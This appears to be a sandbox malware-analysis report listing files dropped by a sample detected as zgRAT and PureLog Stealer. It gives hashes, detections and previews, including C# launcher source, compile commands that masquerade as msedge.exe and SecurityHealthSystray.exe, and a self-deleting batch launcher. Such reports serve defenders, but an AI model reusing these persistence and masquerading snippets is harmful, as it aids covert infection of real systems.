                                              SHA-256:50862026C51DEB2713A638E31C33595AE347BAD3C7E6031BBCF2DE4F3BC76B00
                                              SHA-512:600F3386DABCEEE10B4416B38075232A8644B163D03FFEAD6D9EB5787AF5ADB03DC54B4898F1E78157CEF90FAACD8F36C76801B0F4EB2243F9F98ADA4BEF3D86
                                              Malicious:false
                                              Preview:2O4X460sknTNRVOJvQfgp6MluzEOqMeSxoWYWwweG4qftqMFHJcJMDY6BSmF1lCXJAam90x9eA
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (626), with no line terminators
                                              Category:dropped
                                              Size (bytes):626
                                              Entropy (8bit):5.858931105326176
                                              Encrypted:false
                                              SSDEEP:12:amicuXO2xaVzeEsGSIZHXQPXJp/9DzWDq4bDWY2LYbIUSct2zmJ1vx4u:ate2gzeEsngHO5/LzDst2zCZ
                                              MD5:CA1A4FAF9AD2D3C1673A8C5C373DF1B4
                                              SHA1:6902E259C8B10941E3A651A65C0C4F864D154141
                                              SHA-256:092F6ED70DD1466105FD82B50051A019AA1FA5B069268295C5BAC79B05058644
                                              SHA-512:60985AEF8C2CE1291B4CAF2617917810230A7835C3C4CA3CA05CCA8B3CD1A85A64C1378C9F95794A21D02FACF76B06BD7E6BA7AA46E3A6FCA8345BB07FDCFC28
                                              Malicious:false
Preview:
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with very long lines (755), with no line terminators
                                              Category:dropped
                                              Size (bytes):755
                                              Entropy (8bit):5.907383261208359
                                              Encrypted:false
                                              SSDEEP:12:2HPtn59tdFiA5q43STQj93XNhklfbu4w4sxPcoOdoqQj6kna6IqOVkfa3I1L7F:+tn59v384CgNhklj1slUDm6CSqHfWoV
                                              MD5:3EA4331A9B120AEE034D56F296A7472F
                                              SHA1:AAB16D561BCC9BDEB63EEE8A00836DF7ADC1298F
                                              SHA-256:DEFFCE6EA954D25FFD5B40E3F71CA012FC9E388D17521E6B1EF609401F287EEC
                                              SHA-512:7B94096B7E6FBABE96AB6790FD0D25657E4928C4581FAACF48324A37B16CED2B0FD53D9CEEB3DAF34609CD9FBC758278516ED96D0AA6E2559698D422B6720307
                                              Malicious:false
Preview:
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1607
                                              Entropy (8bit):5.361331326633374
                                              Encrypted:false
                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNpv:iqbYqGSI6oPtzHeqKktVTqZ4vtpv
                                              MD5:EFAAB5F857466904742A13B17E993822
                                              SHA1:6CD78B3052F887B787B47559B0C578DA1E76F0E8
                                              SHA-256:F13D86DE2484AE4B0E3E8B869DA8F5A18CBE72AB0A41939B5D42A47DD84BFA0D
                                              SHA-512:6B1A9F61D4949A88F1552276E926132804B553606B7946757BFE4868270C05B2BEAEE4FBE56552D04E78E26B3E7AC5886363356F9BE4BBD68127CA0BF5304C35
                                              Malicious:true
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey
                                              Process:C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):847
                                              Entropy (8bit):5.354334472896228
                                              Encrypted:false
                                              SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                              MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                              SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                              SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                              SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):19253
                                              Entropy (8bit):5.006225694120903
                                              Encrypted:false
                                              SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeYo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiYo+OdBANZD
                                              MD5:6EC700FCB0AE97553EC01FAEA088C747
                                              SHA1:2D184B28CB5949B49AD548781AD33CDE9BE1F100
                                              SHA-256:B60FC2B328749BD47822EE102E4F1D1618278CB6C899C9A2AAEF97C1F6410AEF
                                              SHA-512:D889E914C32104F69181E9880E4ABE98B71B3BDE0784AA7A8D3F20CE083CFACDB922A63935239339AA195A6B1AEB4C69C994C37A08E041C56A5CB5C91049F9DE
                                              Malicious:false
                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:modified
                                              Size (bytes):64
                                              Entropy (8bit):1.1628158735648508
                                              Encrypted:false
                                              SSDEEP:3:Nllluldhz/lL:NllU
                                              MD5:03744CE5681CB7F5E53A02F19FA22067
                                              SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                              SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                              SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                              Malicious:false
                                              Preview:@...e.................................L..............@..........
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                              Category:dropped
                                              Size (bytes):431
                                              Entropy (8bit):5.105787542160684
                                              Encrypted:false
                                              SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6LPrJZiFkD:JNVQIbSfhWLzIiFkMSfhWLPrJwFkD
                                              MD5:415066276EC6738F350A1DAED3475ECD
                                              SHA1:AA8511B98DC28B93D6E5A2DDD27B4B6DF6EF883E
                                              SHA-256:9E667E3A6400A8D5B76CAAD206FD5A4C13EE53D6CA82F749054B4DDCACDA99CA
                                              SHA-512:B953590AAEC4D0D62B03EA1831469F4690FBD3DEA4D0C5045B3A64EC669C42DB5F517CFBC99572FCA52561F12CF1F0B9C35FEA63CE5635D2C45571B195732BC7
                                              Malicious:false
                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"); } catch { } }).Start();. }.}.
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                              Category:dropped
                                              Size (bytes):269
                                              Entropy (8bit):5.136101982826086
                                              Encrypted:false
                                              SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23frCXqDHn:Hu7L//TRRzscQlZDCeHn
                                              MD5:B0C24BADFB25AD97B9E6AAF6EE09BFD2
                                              SHA1:5FFCB80C1EC2F89B24DD16D51CB3037B6F4D48D5
                                              SHA-256:38DEE2661E7080E45D4218962D003F8966CD4672FF2711DBE4EBF08CC71442CD
                                              SHA-512:CDF61D94EAA7D34A272F9E653DBA54A06C5E2C82B40DC4A1896BC1189E9523D5C1F6446F93DF5DBB77F72E2D4FED05FC5A267AD0E01A924E6028ADE9DAF96573
                                              Malicious:true
                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.0.cs"
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (352), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):773
                                              Entropy (8bit):5.23721298529176
                                              Encrypted:false
                                              SSDEEP:24:KwI/un/VRzstDDCeHuKax5DqBVKVrdFAMBJTH:xN/VRzEMK2DcVKdBJj
                                              MD5:487D77C014B3E61AFB4D750E37FD8FF0
                                              SHA1:DE6DC27E3DCF4B886A286A203EA1BC9AC22E7EF0
                                              SHA-256:503A1B7AA657D7D0910049C67E5E05089C9D2730E6E26720277C482CC46271A6
                                              SHA-512:19A0E8793B64A90D6B27B2747529E6CF9BD3BF197AAEB0439BD0382D37F562183425EBFB0DF47E0A01E09308850446AA9443BF1F339598E0CF9F3B1484CCB663
                                              Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):224
                                              Entropy (8bit):5.313411275287726
                                              Encrypted:false
                                              SSDEEP:6:hCijTg3Nou1SV+DE7Jy4uKOZG1cNwi23faq:HTg9uYDE7JJvZ7
                                              MD5:2DFDAE2A03D2D7045DCDBDCB015AE326
                                              SHA1:5582994BEBD0C8EE307CB8610DBE298E049B003F
                                              SHA-256:F7CF10D57AC0FA145A46BC6BD7562B17F57D25B00FBB6198F63E14C3ED4DBA78
                                              SHA-512:F586138C34BC90A23796FAFB9293ED687E7A765658B77C7F02F37E8C56EB6108D2BC2A4888DBB80AD4FC9C32FADFB8D384BF34B0A1E7B2500AED47855A0E4C28
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\1ke8OVZbVo.bat"
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                              Category:dropped
                                              Size (bytes):416
                                              Entropy (8bit):5.080467882458465
                                              Encrypted:false
                                              SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LPrJZiFkD:JNVQIbSfhV7TiFkMSfhWLPrJwFkD
                                              MD5:E8CF9C5CA14240F987E47AF320CF58D8
                                              SHA1:21D89DDF1158A0B3C5EE75AEB6250852D46886F8
                                              SHA-256:3C2079B0FBAEE82E5BAD8C9C3CAD663705C28FD1CEFA2B757B0C1BFAD759CE67
                                              SHA-512:F32F56FF9494D7CA37AD8826F4DA6E68DCB5DC12EDAEEE94A67E31529B5763066B58E437F4DBC42F07BC10856D874D66ADB46C8D1B9B90EF1BD7E14BE079F1C3
                                              Malicious:false
                                              Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"); } catch { } }).Start();. }.}.
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                              Category:dropped
                                              Size (bytes):254
                                              Entropy (8bit):5.101361725942141
                                              Encrypted:false
                                              SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fZDPAMDPn:Hu7L//TRq79cQlZVzP
                                              MD5:4CB74295599CC8818FAD542367FA8096
                                              SHA1:E7F51A57D36D8EB6886C8BF2AAE4F2C11D80DE82
                                              SHA-256:26B96FBE6397A2712C0884C6598F6B66B7A457EBEBD51AFB221CD09649CB3CCB
                                              SHA-512:31689B90F35A745B5DF53A6D5F696FB3363E8B10D62AA3D25B90B87644375341196BA6D5B81FC859319D7E228D429DE2460F99CE4BCACD385E28B667BF9203F1
                                              Malicious:false
                                              Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.0.cs"
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                              Category:modified
                                              Size (bytes):758
                                              Entropy (8bit):5.253616928876986
                                              Encrypted:false
                                              SSDEEP:12:Ka/I/u7L//TRq79cQlZVz2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KwI/un/Vq79tDVz2Kax5DqBVKVrdFAMb
                                              MD5:92EC7C08EB686CE764DA53701077137B
                                              SHA1:A3468D0C61AFFBF5D3FEEAB7D5DB6AFFF919BADE
                                              SHA-256:971F1F6B4081CD5E734853EF156D4B8454EB613E4917B8AB49FF76D845A8C8B1
                                              SHA-512:1C48E7776F96B5549B59D994B3DD693F7F1D04A26D1CF28F73A420DE95BF8E52CD282513919F582E19AACCBF6798352D6A214E2C3E5F388E5072C7010C51ED5B
                                              Malicious:false
                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):25
                                              Entropy (8bit):4.403856189774723
                                              Encrypted:false
                                              SSDEEP:3:BPeJyoPhz:sJykz
                                              MD5:16D01EEF965A086F7BFE559E1FEAD19F
                                              SHA1:7FABF17FC4A4FE7350E26EF3404F81631F77D072
                                              SHA-256:73CDB20B5671AD72FA9B2D45D1672EA9A842E1AF85927A4787B0EFC312C674AB
                                              SHA-512:03295E9E9E06B2ACFFA76FE2DAB1D3F660F55F249E29DD37F2F389B24B88CE51BAC8610F71DC04FA019EDB2192CAC04EC574B358641BA427127D7090691B0D0D
                                              Malicious:false
                                              Preview:DX0jR5wcM9bupxaANtMjGgXq1
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d4, 10 symbols, created Thu Sep 12 19:38:22 2024, 1st section name ".debug$S"
                                              Category:modified
                                              Size (bytes):1932
                                              Entropy (8bit):4.626429212904413
                                              Encrypted:false
                                              SSDEEP:48:XaLzDaaZdKOZm6lmuulB+hnqXSfbNtmh5N:KnDaWKOc62TkZzNty5N
                                              MD5:A9B02E2EE1E5435B331ED0EEAB267B2E
                                              SHA1:AC68CC4518A7C0325614959192F078FA0EEBFC7D
                                              SHA-256:BD0C2958D72FEDFC07CD08F05CDD5E4E8F36B768494F22E6390E780FE47EA4D6
                                              SHA-512:88AF34C51603623A515AD6BB19E92D0740FD0D7B471D2F95F06201865A8FB2B10916A63966365F7258D4BC5B493B57F10ACC43F48F4E2AC954445AF3DD0B5758
                                              Malicious:false
                                              Preview:L....C.f.............debug$S........\...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES6986.tmp.-.<....................a..Microsoft (R) CVTRES.b.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Thu Sep 12 19:38:23 2024, 1st section name ".debug$S"
                                              Category:modified
                                              Size (bytes):1956
                                              Entropy (8bit):4.578011667038515
                                              Encrypted:false
                                              SSDEEP:24:HkO9GXOIZHjwKOZmN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:FIZUKOZmyluOulajfqXSfbNtmh1Z
                                              MD5:D11CDF5B59DC194625A144C9BE599DB2
